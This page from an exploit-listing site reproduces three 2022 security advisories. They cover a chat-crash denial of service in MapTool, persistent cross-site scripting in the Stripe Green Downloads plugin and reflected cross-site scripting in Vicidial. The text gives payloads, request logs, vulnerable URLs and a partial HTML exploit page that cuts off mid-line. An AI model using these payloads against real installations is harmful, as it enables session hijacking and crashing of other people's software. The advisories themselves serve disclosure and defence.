Latest exploits :: CodePwn

<pre><code>Document Title: =============== MapTool v1.11.5 - Denial of Service Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2318 Release Date: ============= 2022-10-10 Vulnerability Laboratory ID (VL-ID): ==================================== 2318 Common Vulnerability Scoring System: ==================================== 5.7 Vulnerability Class: ==================== Denial of Service Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects, and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight. The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds, but for your game where stability matters sticking to the major releases is recommended. MapTool campaigns saved in newer versions may not work on older versions, so be careful with your campaign files when trying out development builds. (Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool ) (Download Software:https://www.rptools.net/toolbox/download-rptools-products ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a remote denial of service vulnerability in the official MapTool v1.11.5 software. Affected Product(s): ==================== Rptools Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS) Vulnerability Disclosure Timeline: ================================== 2022-06-03: Researcher Notification & Coordination (Security Researcher) 2022-06-04: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2022-10-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ The remote denial of service software vulnerability is located in the chat function of the official MapTool v1.11.5 windows software. Attackers with chat access can transmit a malformed special crafted payload that returns a null pointer in javax.swing.text.html.StyleSheet (javax.swing.text.View) and javax.swing.text.html.BlockView.layoutMinorAxis. Attacker are able to inject payloads to crash the application immediatly and permanently. The compromised communication and project can be saved as cmpgn file and crashs the application on each import with the unhandled null pointer exception. Vulnerable Module(s): [+] Chat (Werkzeuge / Tools) Vulnerable Function(s): [+] javax.swing.text.html.StyleSheet$BoxPainter [+] javax.swing.text.html.BlockView.layoutMinorAxis Proof of Concept (PoC): ======================= The remote denial of service vulnerability can be exploited by remote attacker or without interaction or local users. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability locally: 1. Install the maptool newst version 2. Start the tool and open a own host 3. Open the message chat box 4. Include the payload and push the send button 5. The software crashs locally by null pointer Note: open the client again and copy the chat with a cmpgn file 6. Now you can locally import it to crash the host via null pointer Manual steps to reproduce the vulnerability remotely: 1. Install the maptool newst version 2. Start the tool and join an exisiting party 3. Open the chat 4. Inject the payload with a local js or base64 encoded link and submit it 5. The host receives the chat message and clicks the link the host session crashs via null pointer Payload: <FRAMESET></FRAMESET> PoC: testfile.cmpgn --- Debug Session Logs --- java.lang.ArrayIndexOutOfBoundsException: Index 1 out of bounds for length 1 at java.desktop/javax.swing.text.html.BlockView.layoutMinorAxis(Unknown Source) at java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.layoutMinorAxis(Unknown Source) at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source) at java.desktop/javax.swing.text.BoxView.layout(Unknown Source) at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source) at java.desktop/javax.swing.text.BoxView.updateChildSizes(Unknown Source) at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source) at java.desktop/javax.swing.text.BoxView.layout(Unknown Source) at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source) at java.desktop/javax.swing.plaf.basic.BasicTextUI$RootView.setSize(Unknown Source) at java.desktop/javax.swing.plaf.basic.BasicTextUI.getPreferredSize(Unknown Source) at java.desktop/javax.swing.JComponent.getPreferredSize(Unknown Source) at java.desktop/javax.swing.JEditorPane.getPreferredSize(Unknown Source) at java.desktop/javax.swing.ScrollPaneLayout.layoutContainer(Unknown Source) at java.desktop/java.awt.Container.layout(Unknown Source) at java.desktop/java.awt.Container.doLayout(Unknown Source) at java.desktop/java.awt.Container.validateTree(Unknown Source) at java.desktop/java.awt.Container.validate(Unknown Source) at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source) at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source) at java.base/java.security.AccessController.doPrivileged(Unknown Source) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source) at java.desktop/javax.swing.RepaintManager.validateInvalidComponents(Unknown Source) at java.desktop/javax.swing.RepaintManager$ProcessingRunnable.run(Unknown Source) at java.desktop/java.awt.event.InvocationEvent.dispatch(Unknown Source) at java.desktop/java.awt.EventQueue.dispatchEventImpl(Unknown Source) at java.desktop/java.awt.EventQueue$4.run(Unknown Source) at java.desktop/java.awt.EventQueue$4.run(Unknown Source) at java.base/java.security.AccessController.doPrivileged(Unknown Source) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source) at java.desktop/java.awt.EventQueue.dispatchEvent(Unknown Source) at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:54) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source) at java.desktop/java.awt.WaitDispatchSupport$2.run(Unknown Source) at java.desktop/java.awt.WaitDispatchSupport$4.run(Unknown Source) at java.desktop/java.awt.WaitDispatchSupport$4.run(Unknown Source) at java.base/java.security.AccessController.doPrivileged(Unknown Source) at java.desktop/java.awt.WaitDispatchSupport.enter(Unknown Source) at java.desktop/java.awt.Dialog.show(Unknown Source) at java.desktop/java.awt.Component.show(Unknown Source) at java.desktop/java.awt.Component.setVisible(Unknown Source) at java.desktop/java.awt.Window.setVisible(Unknown Source) at java.desktop/java.awt.Dialog.setVisible(Unknown Source) at net.rptools.maptool.client.swing.MapToolEventQueue.displayPopup(MapToolEventQueue.java:109) at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:73) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source) at java.desktop/java.awt.EventDispatchThread.run(Unknown Source) - Java.lang.NullPointerException: Cannot invoke "javax.swing.text.html.StyleSheet$BoxPainter.getInset(int, javax.swing.text.View)" because "this.painter" is null at java.desktop/javax.swing.text.html.TableView.updateInsets(Unknown Source) at java.desktop/javax.swing.text.html.TableView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source) at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source) at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source) at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source) at java.desktop/javax.swing.text.html.BlockView.getMinimumSpan(Unknown Source) at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source) at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source) at java.desktop/javax.swing.text.html.BlockView.getMinimumSpan(Unknown Source) at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source) at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source) at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source) at java.desktop/javax.swing.text.BoxView.layout(Unknown Source) at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source) at java.desktop/javax.swing.plaf.basic.BasicTextUI$RootView.setSize(Unknown Source) at java.desktop/javax.swing.plaf.basic.BasicTextUI.getPreferredSize(Unknown Source) at java.desktop/javax.swing.JComponent.getPreferredSize(Unknown Source) at java.desktop/javax.swing.JEditorPane.getPreferredSize(Unknown Source) at java.desktop/javax.swing.ScrollPaneLayout.layoutContainer(Unknown Source) at java.desktop/java.awt.Container.layout(Unknown Source) at java.desktop/java.awt.Container.doLayout(Unknown Source) at java.desktop/java.awt.Container.validateTree(Unknown Source) at java.desktop/java.awt.Container.validate(Unknown Source) at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source) at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source) at java.base/java.security.AccessController.doPrivileged(Unknown Source) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source) at java.desktop/javax.swing.RepaintManager.validateInvalidComponents(Unknown Source) at java.desktop/javax.swing.RepaintManager$ProcessingRunnable.run(Unknown Source) at java.desktop/java.awt.event.InvocationEvent.dispatch(Unknown Source) at java.desktop/java.awt.EventQueue.dispatchEventImpl(Unknown Source) at java.desktop/java.awt.EventQueue$4.run(Unknown Source) at java.desktop/java.awt.EventQueue$4.run(Unknown Source) at java.base/java.security.AccessController.doPrivileged(Unknown Source) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source) at java.desktop/java.awt.EventQueue.dispatchEvent(Unknown Source) at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:54) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source) at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source) at java.desktop/java.awt.EventDispatchThread.run(Unknown Source) Security Risk: ============== The security risk of the remote denial of service vulnerability in the maptool software is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Stripe Green Downloads 2.03 - Cross Site Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2287 Release Date: ============= 2022-10-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2287 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Easily configure the plugin to accept payments through Stripe with Strong Customer Authentication. Easily style payment button with overall styling settings. Tons of options for any needs. Host files in secured folder, Media Library (WordPress plugin only) or anywhere on your server. Send custom email notifications to buyer and administrator after successful payments. Collect statistics of button impressions, payments and downloads for any file for any period. (Copy of the Homepage:https://halfdata.com/green-downloads/stripe/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Stripe Green Downloads web-application and wordpress plugin. Affected Product(s): ==================== halfdata Product: Stripe Green Downloads - Admin Panel v1.0 (Web-Application) Product: Stripe Green Downloads - Wordpress Plugin 2.03 (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-10-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the Stripe Green Downloads web-application and wordpress plugin v2.03. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent xss web vulnerability is located in the `Label`, `Processing label` and `Download label` input fields of the `Green Downloads - Settings - Button` module. Attackers with local privileged to access the panel are able to inject own malicious script code to the button that executes the content in the preview context. The request method to inject is post and the attack vector is persistent on the application-side. The vulnerable parameters are `idcore-button-label`, `idcore-button-label-processing` and `idcore-button-label-download`. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Vulnerable Module(s): [+] Green Downloads - Settings - Button Vulnerable Input(s): [+] Label [+] Processing label [+] Download label Vulnerable Parameter(s): [+] idcore-button-label [+] idcore-button-label-processing [+] idcore-button-label-download Affected Module(s): [+] Preview (/stripe/script/?page=idcore-settings) Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers with privileged account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: /stripe/script/?page=idcore-settings <tbody><tr><td colspan="2"><hr></td></tr> <tr><th>Preview:</th><td> <div id="idcore-preview-content" class="idcore-preview-container"><link href="//x/css?family=Strait:100,200,300,400,500,600,700,800,900& subset=arabic,vietnamese,hebrew,thai,bengali,latin,latin-ext,cyrillic,cyrillic-ext,greek" rel="stylesheet" type="text/css"><style>.idcore-preview-button{font-family:'Strait','arial';font-size:20px;color:#ffffff;font-weight:normal;font-style:normal; text-decoration:none;text-transform:uppercase;width:250px;height:56px;line-height:56px;background-color:#d4150b; background-image:linear-gradient(to bottom,rgba(255,255,255,.05) 0,rgba(255,255,255,.05) 50%,rgba(0,0,0,.05) 51%,rgba(0,0,0,.05) 100%); border-width:1px;border-style:solid;border-color:#d4150b;border-radius:3px;box-shadow: 2px 2px 0px 0px rgba(68, 68, 68, 0.2);}</style> data-label="Buy Now:>"<iframe src=evil.source onload=alert(document.cookie)> 5.00 USD" data-label-processing="Processing...>"<iframe src=evil.source onload=alert(document.cookie)>" data-label-download="Download Now!>"<iframe src=evil.source onload=alert(document.cookie)>" data-state="3">Download Now!>"<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div> </td></tr></tbody> --- PoC Session Logs (POST) --- https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/ajax.php Host: green-downloads.localhost:8080 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 4829 Origin:https://green-downloads.localhost:8080 Connection: keep-alive Referer:https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/?page=idcore-settings Cookie: uap-auth=njqYqYrjVyg7aWCO; __stripe_mid=2939b7be-7000-43b1-9940-d26f391ae745ab4b3a; __stripe_sid=0813d899-c76d-4b14-832d-d55565cd96dbdc938 Post: Admin Panel&idcore-button-label=Buy Now:>"<iframe src=evil.source onload=alert(document.cookie)> {price} {currency} &idcore-button-label-processing=Processing...>"<iframe src=evil.source onload=alert(document.cookie)> &idcore-button-label-download=Download Now!>"<iframe src=evil.source onload=alert(document.cookie)>&idcore-button-size=fixed&idcore-button-width=250 &idcore-button-height=56&idcore-button-padding-top=16&idcore-button-padding-right=32&idcore-button-padding-bottom=16 &idcore-button-padding-left=32&idcore-responsiveness-size=480&idcore-responsiveness-custom=480&idcore-button-text-family=Strait &idcore-button-text-size=20&idcore-button-text-transform=uppercase&idcore-button-text-color=#ffffff&idcore-button-background-image= &idcore-button-background-size=auto&idcore-button-background-hposition=left&idcore-button-background-vposition=top &idcore-button-background-repeat=repeat&idcore-button-background-color=#d4150b&idcore-button-background-gradient=2shades&idcore-button-background-color2= &idcore-button-border-width=1&idcore-button-border-style=solid &idcore-button-border-radius=3&idcore-button-border-left=on&idcore-button-border-top=on&idcore-button-border-bottom=on &idcore-button-border-right=on&idcore-button-border-color=#d4150b&idcore-button-shadow-size=small&idcore-button-shadow-style=solid &idcore-button-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-hover-inherit=on&idcore-button-hover-text-family=Strait&idcore-button-hover-text-size=20 &idcore-button-hover-text-transform=uppercase&idcore-button-hover-text-color=#ffffff&idcore-button-hover-background-image= &idcore-button-hover-background-size=auto&idcore-button-hover-background-hposition=left&idcore-button-hover-background-vposition=top &idcore-button-hover-background-repeat=repeat&idcore-button-hover-background-color=#d4150b&idcore-button-hover-background-gradient=2shades &idcore-button-hover-background-color2=&idcore-button-hover-border-width=1&idcore-button-hover-border-style=solid&idcore-button-hover-border-radius=3 &idcore-button-hover-border-left=on&idcore-button-hover-border-top=on&idcore-button-hover-border-bottom=on&idcore-button-hover-border-right=on &idcore-button-hover-border-color=#d4150b&idcore-button-hover-shadow-size=small&idcore-button-hover-shadow-style=solid &idcore-button-hover-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-active-inherit=on&idcore-button-active-text-family=Strait&idcore-button-active-text-size=20 &idcore-button-active-text-transform=uppercase&idcore-button-active-text-color=#ffffff&idcore-button-active-background-image= &idcore-button-active-background-size=auto&idcore-button-active-background-hposition=left&idcore-button-active-background-vposition=top &idcore-button-active-background-repeat=repeat&idcore-button-active-background-color=#d4150b&idcore-button-active-background-gradient=2shades &idcore-button-active-background-color2=&idcore-button-active-border-width=1&idcore-button-active-border-style=solid&idcore-button-active-border-radius=3 &idcore-button-active-border-left=on&idcore-button-active-border-top=on&idcore-button-active-border-bottom=on&idcore-button-active-border-right=on &idcore-button-active-border-color=#d4150b&idcore-button-active-shadow-size=small&idcore-button-active-shadow-style=solid &idcore-button-active-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-active-transform=shift-down&idcore-amazon-access-key=&idcore-amazon-secret-key= &idcore-amazon-bucket=&idcore-error-invalid-link=Invalid download link.&idcore-error-expired-link=Download link expired. &idcore-error-no-file=File does not exist.&idcore-link-lifetime=72&idcore-csv-separator=;&idcore-cross-domain-enable=on&idcore-admin-menu-stats=on &action=idcore-update-settings&idcore_version=2 - POST: HTTP/1.1 200 OK Server: Apache/2.4.18 (Ubuntu) Access-Control-Allow-Origin: * Content-Length: 68 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Security Risk: ============== The security risk of the persistent input validation web vulnerability in the stripe application and wordpress plugin is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Vicidial v2.14-783a - Multiple XSS Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2311 Release Date: ============= 2022-10-11 Vulnerability Laboratory ID (VL-ID): ==================================== 2311 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer. The management interface is also web-based and offers the ability to view many real-time and summary reports as well as many detailed campaign and agent options and settings. VICIDIAL can function as an ACD for inbound calls or for Closer calls coming from VICIDIAL outbound fronters and even allows for remote agents logging in from remote locations as well as remote agents that may only have a phone. There are currently over 24,000 installations of VICIDIAL in production in over 100 countries around the world, several with over 300 agent seats and many with multiple locations. (Copy of the Homepage:https://www.vicidial.org/vicidial.php ) (Download:https://www.vicidial.org/vicidial.php ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple client-site cross site scripting vulnerabilities in the VICIDIAL v2.14-783a web-application. Affected Product(s): ==================== Vicidial Group Product: Vicidial v2.14-783a - (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-01-15: Researcher Notification & Coordination (Security Researcher) 2022-01-16: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2022-10-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official VICIDIAL v2.14-783a web-application. The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user session data or to manipulate application contents for clients. The vulnerabilities are located in the `end_date`, `query_date`, `shift`, `type`, `use_lists`, `search_archived_data`, `start_hour`, `end_hour`, `stage`, `agent`, `user`, `db` parameters of the vulnerable `AST_IVRstats.php`, `AST_LISTS_pass_report.php`, `AST_user_group_hourly_detail.php`, `AST_agent_time_sheet.php`, `AST_agent_days_detail.php`, `user_status.php`, `admin_lists_custom.php` and `admin.php` files. Remote attackers are able to create special crafted malicious links to execute client-side script code from the application context. The request method to inject is GET and the attack vector is non-persistent. The identified web vulnerabilities are classic cross site scripting issues. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable File(s): [+] AST_IVRstats.php [+] AST_LISTS_pass_report.php [+] AST_user_group_hourly_detail.php [+] AST_agent_time_sheet.php [+] AST_agent_days_detail.php [+] user_status.php [+] admin_lists_custom.php [+] admin.php Vulnerable Parameter(s): [+] end_date [+] query_date [+] shift [+] type [+] use_lists [+] search_archived_data [+] start_hour [+] end_hour [+] stage [+] agent [+] user [+] db Affected Module(s): [+] Backend Administration Web UI (Agents, Managers & Admins) Proof of Concept (PoC): ======================= The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: (PoC - IVR Report) </td><td rowspan="2" valign="TOP"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="/vicidial_demo/AST_IVRstats.php?DB=& type=inbound&query_date=2022-01-16&end_date=2022-01-16&query_date_D=2022-01-16&query_date_T= &end_date_D=2022-01-16&end_date_T=&shift=[MALICIOUS SCRIPT CODE EXECUTION POINT!]"><iframe src="evil.source" onload="alert(document.domain)"></iframe> &file_download=1&search_archived_data=">DOWNLOAD</a> | <a href="./admin.php?ADD=3111&group_id=">MODIFY</a> | <a href="./admin.php?ADD=999999">REPORTS</a> | <a href="./AST_CLOSERstats.php?query_date=2022-01-16& end_date=2022-01-16&shift=">[MALICIOUS SCRIPT CODE EXECUTION POINT!]<iframe src="evil.source" onload="alert(document.domain)"></iframe>">CLOSER REPORT</a> </td></tr> PoC: Payload <iframe src=evil.source onload=alert(document.domain)></iframe> PoC: Vulnerable Parameters https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date[XSS]+23%3A59%3A59&query_date_D= &query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=[XSS]+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D= &query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D= &query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift[XSS]&report_display_type=HTML https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=[XSS]&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D= &query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=[XSS]&type=inbound&query_date=+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D= &query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML https://vicidial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=&use_lists=[XSS]&report_display_type=HTML&SUBMIT=SUBMIT https://vicidial.localhost:8080/vicidial/admin.php?query_date[XSS]&end_date=2022-01-04&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL https://vicidial.localhost:8080/vicidial/admin.php?query_date=2021-12-06&end_date=[XSS]&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=16&end_hour=16&SUBMIT=&search_archived_data=[XSS] https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=[XSS]&end_hour=[XSS]&file_download=1&SUBMIT=&search_archived_data= https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=[XSS]&agent=[XSS]&SUBMIT=SUBMIT https://vicidial.localhost:8080/vicidial/user_status.php?user=[XSS] https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=2022-01-15&group[]=--ALL--&shift=[XSS] https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=[XSS]&group[]=--ALL--&shift=ALL https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=[XSS]&end_date=2022-01-15&group[]=--ALL--&shift=ALL https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?DB=&query_date=2022-01-15&end_date=2022-01-15&group%5B%5D=0408&report_display_type=TEXT&user=[XSS]&shift=ALL&SUBMIT=SUBMIT https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?query_date=2022-01-15&end_date=2022-01-15&shift=ALL&DB=&user=8178&group[]=0408&search_archived_data=&report_display_type=TEXT&stage=[XSS] https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=2022-01-15&agent=[XSS]&SUBMIT=SUBMIT https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente&field_type=TEXT&field_duplicate=N&DB=[XSS] PoC: Exploitation <html> <head><body> <title>vicidial xss exploit</title> <iframe src"https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente &field_type=TEXT&field_duplicate=N&DB=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe> <iframe 